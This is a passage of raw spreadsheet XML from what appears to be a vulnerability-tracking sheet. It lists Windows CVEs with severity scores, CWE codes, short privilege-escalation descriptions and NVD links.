t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t></is></c></row><row r="1381"><c r="A1381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1381" s="5" t="inlineStr"><is><t>CVE-2026-69413</t></is></c><c r="D1381" s="5" t="n"><v>7</v></c><c r="E1381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1381" s="5" t="inlineStr" /><c r="H1381" s="5" t="n"><v>0.003</v></c><c r="I1381" s="5" t="inlineStr" /><c r="J1381" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K13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81" s="5" t="inlineStr" /><c r="M1381" s="5" t="inlineStr" /><c r="N1381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1381" s="5" t="inlineStr" /><c r="Q1381" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1381" s="5" t="inlineStr"><is><t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t></is></c></row><row r="1382"><c r="A1382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1382" s="5" t="inlineStr"><is><t>CVE-2026-69422</t></is></c><c r="D1382" s="5" t="n"><v>7</v></c><c r="E1382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1382" s="5" t="inlineStr" /><c r="H1382" s="5" t="n"><v>0.003</v></c><c r="I1382" s="5" t="inlineStr" /><c r="J1382" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1382" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1382" s="5" t="inlineStr" /><c r="M1382" s="5" t="inlineStr" /><c r="N1382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1382" s="5" t="inlineStr" /><c r="Q1382" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1382" s="5" t="inlineStr"><is><t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t></is></c></row><row r="1383"><c r="A1383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1383" s="5" t="inlineStr"><is><t>CVE-2026-69430</t></is></c><c r="D1383" s="5" t="n"><v>7</v></c><c r="E1383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1383" s="5" t="inlineStr" /><c r="H1383" s="5" t="n"><v>0.003</v></c><c r="I1383" s="5" t="inlineStr" /><c r="J1383" s="5" t="inlineStr" /><c r="K1383" s="5" t="inlineStr" /><c r="L1383" s="5" t="inlineStr" /><c r="M1383" s="5" t="inlineStr" /><c r="N1383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1383" s="5" t="inlineStr" /><c r="Q1383" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1383" s="5" t="inlineStr"><is><t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t></is></c></row><row r="1384"><c r="A1384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1384" s="5" t="inlineStr"><is><t>CVE-2026-69440</t></is></c><c r="D1384" s="5" t="n"><v>7</v></c><c r="E1384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1384" s="5" t="inlineStr" /><c r="H1384" s="5" t="n"><v>0.002</v></c><c r="I1384" s="5" t="inlineStr" /><c r="J1384" s="5" t="inlineStr" /><c r="K1384" s="5" t="inlineStr" /><c r="L1384" s="5" t="inlineStr" /><c r="M1384" s="5" t="inlineStr" /><c r="N1384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1384" s="5" t="inlineStr" /><c r="Q1384" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1384" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t></is></c></row><row r="1385"><c r="A1385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1385" s="5" t="inlineStr"><is><t>CVE-2026-69441</t></is></c><c r="D1385" s="5" t="n"><v>7</v></c><c r="E1385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1385" s="5" t="inlineStr" /><c r="H1385" s="5" t="n"><v>0.002</v></c><c r="I1385" s="5" t="inlineStr" /><c r="J1385" s="5" t="inlineStr" /><c r="K1385" s="5" t="inlineStr" /><c r="L1385" s="5" t="inlineStr" /><c r="M1385" s="5" t="inlineStr" /><c r="N1385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1385" s="5" t="inlineStr" /><c r="Q1385" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1385" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t></is></c></row><row r="1386"><c r="A1386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1386" s="5" t="inlineStr"><is><t>CVE-2026-69448</t></is></c><c r="D1386" s="5" t="n"><v>7</v></c><c r="E1386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1386" s="5" t="inlineStr" /><c r="H1386" s="5" t="n"><v>0.002</v></c><c r="I1386" s="5" t="inlineStr" /><c r="J1386" s="5" t="inlineStr" /><c r="K1386" s="5" t="inlineStr" /><c r="L1386" s="5" t="inlineStr" /><c r="M1386" s="5" t="inlineStr" /><c r="N1386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1386" s="5" t="inlineStr" /><c r="Q1386" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1386" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t></is></c></row><row r="1387"><c r="A1387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1387" s="5" t="inlineStr"><is><t>CVE-2026-69466</t></is></c><c r="D1387" s="5" t="n"><v>7</v></c><c r="E1387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1387" s="5" t="inlineStr" /><c r="H1387" s="5" t="n"><v>0.002</v></c><c r="I1387" s="5" t="inlineStr" /><c r="J1387" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K138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87" s="5" t="inlineStr" /><c r="M1387" s="5" t="inlineStr" /><c r="N1387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1387" s="5" t="inlineStr" /><c r="Q1387" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1387" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t></is></c></row><row r="1388"><c r="A1388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1388" s="5" t="inlineStr"><is><t>CVE-2026-69468</t></is></c><c r="D1388" s="5" t="n"><v>7</v></c><c r="E1388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1388" s="5" t="inlineStr" /><c r="H1388" s="5" t="n"><v>0.003</v></c><c r="I1388" s="5" t="inlineStr" /><c r="J1388" s="5" t="inlineStr" /><c r="K1388" s="5" t="inlineStr" /><c r="L1388" s="5" t="inlineStr" /><c r="M1388" s="5" t="inlineStr" /><c r="N1388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1388" s="5" t="inlineStr" /><c r="Q1388" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t></is></c></row><row r="1389"><c r="A1389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1389" s="5" t="inlineStr"><is><t>CVE-2026-69470</t></is></c><c r="D1389" s="5" t="n"><v>7</v></c><c r="E1389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1389" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1389" s="5" t="inlineStr" /><c r="H1389" s="5" t="n"><v>0.003</v></c><c r="I1389" s="5" t="inlineStr" /><c r="J1389" s="5" t="inlineStr" /><c r="K1389" s="5" t="inlineStr" /><c r="L1389" s="5" t="inlineStr" /><c r="M1389" s="5" t="inlineStr" /><c r="N1389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1389" s="5" t="inlineStr" /><c r="Q1389" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1389" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t></is></c></row><row r="1390"><c r="A1390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1390" s="5" t="inlineStr"><is><t>CVE-2026-69472</t></is></c><c r="D1390" s="5" t="n"><v>7</v></c><c r="E1390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1390" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1390" s="5" t="inlineStr" /><c r="H1390" s="5" t="n"><v>0.003</v></c><c r="I1390" s="5" t="inlineStr" /><c r="J1390" s="5" t="inlineStr" /><c r="K1390" s="5" t="inlineStr" /><c r="L1390" s="5" t="inlineStr" /><c r="M1390" s="5" t="inlineStr" /><c r="N1390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1390" s="5" t="inlineStr" /><c r="Q1390" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1390" s="5" t="inlineStr"><is><t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t></is></c></row><row r="1391"><c r="A1391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1391" s="5" t="inlineStr"><is><t>CVE-2026-69473</t></is></c><c r="D1391" s="5" t="n"><v>7</v></c><c r="E1391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1391" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1391" s="5" t="inlineStr" /><c r="H1391" s="5" t="n"><v>0.003</v></c><c r="I1391" s="5" t="inlineStr" /><c r="J1391" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K139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391" s="5" t="inlineStr" /><c r="M1391" s="5" t="inlineStr" /><c r="N1391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1391" s="5" t="inlineStr" /><c r="Q1391" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1391" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t></is></c></row><row r="1392"><c r="A1392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1392" s="5" t="inlineStr"><is><t>CVE-2026-69488</t></is></c><c r="D1392" s="5" t="n"><v>7</v></c><c r="E1392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1392" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1392" s="5" t="inlineStr" /><c r="H1392" s="5" t="n"><v>0.003</v></c><c r="I1392" s="5" t="inlineStr" /><c r="J1392" s="5" t="inlineStr" /><c r="K1392" s="5" t="inlineStr" /><c r="L1392" s="5" t="inlineStr" /><c r="M1392" s="5" t="inlineStr" /><c r="N1392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1392" s="5" t="inlineStr" /><c r="Q1392" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1392" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t></is></c></row><row r="1393"><c r="A1393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1393" s="5" t="inlineStr"><is><t>CVE-2026-69492</t></is></c><c r="D1393" s="5" t="n"><v>7</v></c><c r="E1393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1393" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1393" s="5" t="inlineStr" /><c r="H1393" s="5" t="n"><v>0.003</v></c><c r="I1393" s="5" t="inlineStr" /><c r="J1393" s="5" t="inlineStr" /><c r="K1393" s="5" t="inlineStr" /><c r="L1393" s="5" t="inlineStr" /><c r="M1393" s="5" t="inlineStr" /><c r="N1393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1393" s="5" t="inlineStr" /><c r="Q1393" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1393" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t></is></c></row><row r="1394"><c r="A1394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1394" s="5" t="inlineStr"><is><t>CVE-2026-69498</t></is></c><c r="D1394" s="5" t="n"><v>7</v></c><c r="E1394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1394" s="5" t="inlineStr" /><c r="H1394" s="5" t="n"><v>0.003</v></c><c r="I1394" s="5" t="inlineStr" /><c r="J1394" s="5" t="inlineStr" /><c r="K1394" s="5" t="inlineStr" /><c r="L1394" s="5" t="inlineStr" /><c r="M1394" s="5" t="inlineStr" /><c r="N1394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1394" s="5" t="inlineStr" /><c r="Q1394" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1394" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t></is></c></row><row r="1395"><c r="A1395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1395" s="5" t="inlineStr"><is><t>CVE-2026-69500</t></is></c><c r="D1395" s="5" t="n"><v>7</v></c><c r="E1395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1395" s="5" t="inlineStr" /><c r="H1395" s="5" t="n"><v>0.003</v></c><c r="I1395" s="5" t="inlineStr" /><c r="J1395" s="5" t="inlineStr" /><c r="K1395" s="5" t="inlineStr" /><c r="L1395" s="5" t="inlineStr" /><c r="M1395" s="5" t="inlineStr" /><c r="N1395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1395" s="5" t="inlineStr" /><c r="Q1395" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1395" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t></is></c></row><row r="1396"><c r="A1396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1396" s="5" t="inlineStr"><is><t>CVE-2026-69501</t></is></c><c r="D1396" s="5" t="n"><v>7</v></c><c r="E1396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1396" s="5" t="inlineStr" /><c r="H1396" s="5" t="n"><v>0.002</v></c><c r="I1396" s="5" t="inlineStr" /><c r="J1396" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1396" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1396" s="5" t="inlineStr" /><c r="M1396" s="5" t="inlineStr" /><c r="N1396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1396" s="5" t="inlineStr" /><c r="Q1396" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1396" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t></is></c></row><row r="1397"><c r="A1397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1397" s="5" t="inlineStr"><is><t>CVE-2026-69516</t></is></c><c r="D1397" s="5" t="n"><v>7</v></c><c r="E1397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1397" s="5" t="inlineStr" /><c r="H1397" s="5" t="n"><v>0.002</v></c><c r="I1397" s="5" t="inlineStr" /><c r="J1397" s="5" t="inlineStr" /><c r="K1397" s="5" t="inlineStr" /><c r="L1397" s="5" t="inlineStr" /><c r="M1397" s="5" t="inlineStr" /><c r="N1397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1397" s="5" t="inlineStr" /><c r="Q1397" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1397" s="5" t="inlineStr"><is><t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t></is></c></row><row r="1398"><c r="A1398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1398" s="5" t="inlineStr"><is><t>CVE-2026-69517</t></is></c><c r="D1398" s="5" t="n"><v>7</v></c><c r="E1398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1398" s="5" t="inlineStr" /><c r="H1398" s="5" t="n"><v>0.003</v></c><c r="I1398" s="5" t="inlineStr" /><c r="J1398" s="5" t="inlineStr" /><c r="K1398" s="5" t="inlineStr" /><c r="L1398" s="5" t="inlineStr" /><c r="M1398" s="5" t="inlineStr" /><c r="N1398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1398" s="5" t="inlineStr" /><c r="Q1398" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1398" s="5" t="inlineStr"><is><t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t></is></c></row><row r="1399"><c r="A1399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1399" s="5" t="inlineStr"><is><t>CVE-2026-69540</t></is></c><c r="D1399" s="5" t="n"><v>7</v></c><c r="E1399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1399" s="5" t="inlineStr" /><c r="H1399" s="5" t="n"><v>0.003</v></c><c r="I1399" s="5" t="inlineStr" /><c r="J1399" s="5" t="inlineStr" /><c r="K1399" s="5" t="inlineStr" /><c r="L1399" s="5" t="inlineStr" /><c r="M1399" s="5" t="inlineStr" /><c r="N1399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1399" s="5" t="inlineStr" /><c r="Q1399" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1399" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t></is></c></row><row r="1400"><c r="A1400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1400" s="5" t="inlineStr"><is><t>CVE-2026-69549</t></is></c><c r="D1400" s="5" t="n"><v>7</v></c><c r="E1400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1400" s="5" t="inlineStr" /><c r="H1400" s="5" t="n"><v>0.003</v></c><c r="I1400" s="5" t="inlineStr" /><c r="J1400" s="5" t="inlineStr" /><c r="K1400" s="5" t="inlineStr" /><c r="L1400" s="5" t="inlineStr" /><c r="M1400" s="5" t="inlineStr" /><c r="N1400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1400" s="5" t="inlineStr" /><c r="Q1400" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="R1400" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t></is></c></row><row r="1401"><c r="A1401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1401" s="5" t="inlineStr"><is><t>CVE-2026-69560</t></is></c><c r="D1401" s="5" t="n"><v>7</v></c><c r="E1401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1401" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1401" s="5" t="inlineStr" /><c r="H1401" s="5" t="n"><v>0.003</v></c><c r="I1401" s="5" t="inlineStr" /><c r="J1401" s="5" t="inlineStr" /><c r="K1401" s="5" t="inlineStr" /><c r="L1401" s="5" t="inlineStr" /><c r="M1401" s="5" t="inlineStr" /><c r="N1401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1401" s="5" t="inlineStr" /><c r="Q1401" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1401" s="5" t="inlineStr"><is><t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t></is></c></row><row r="1402"><c r="A1402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1402" s="5" t="inlineStr"><is><t>CVE-2026-69563</t></is></c><c r="D1402" s="5" t="n"><v>7</v></c><c r="E1402" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1402" s="5" t="inlineStr" /><c r="H1402" s="5" t="n"><v>0.002</v></c><c r="I1402" s="5" t="inlineStr" /><c r="J1402" s="5" t="inlineStr" /><c r="K1402" s="5" t="inlineStr" /><c r="L1402" s="5" t="inlineStr" /><c r="M1402" s="5" t="inlineStr" /><c r="N1402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1402" s="5" t="inlineStr" /><c r="Q1402" s="5" t="inlineStr"><is><t>CWE-122, CWE-367</t></is></c><c r="R1402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t></is></c></row><row r="1403"><c r="A1403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1403" s="5" t="inlineStr"><is><t>CVE-2026-69564</t></is></c><c r="D1403" s="5" t="n"><v>7</v></c><c r="E1403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1403" s="5" t="inlineStr" /><c r="H1403" s="5" t="n"><v>0.003</v></c><c r="I1403" s="5" t="inlineStr" /><c r="J1403" s="5" t="inlineStr" /><c r="K1403" s="5" t="inlineStr" /><c r="L1403" s="5" t="inlineStr" /><c r="M1403" s="5" t="inlineStr" /><c r="N1403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1403" s="5" t="inlineStr" /><c r="Q1403" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1403" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t></is></c></row><row r="1404"><c r="A1404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1404" s="5" t="inlineStr"><is><t>CVE-2026-69567</t></is></c><c r="D1404" s="5" t="n"><v>7</v></c><c r="E1404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1404" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1404" s="5" t="inlineStr" 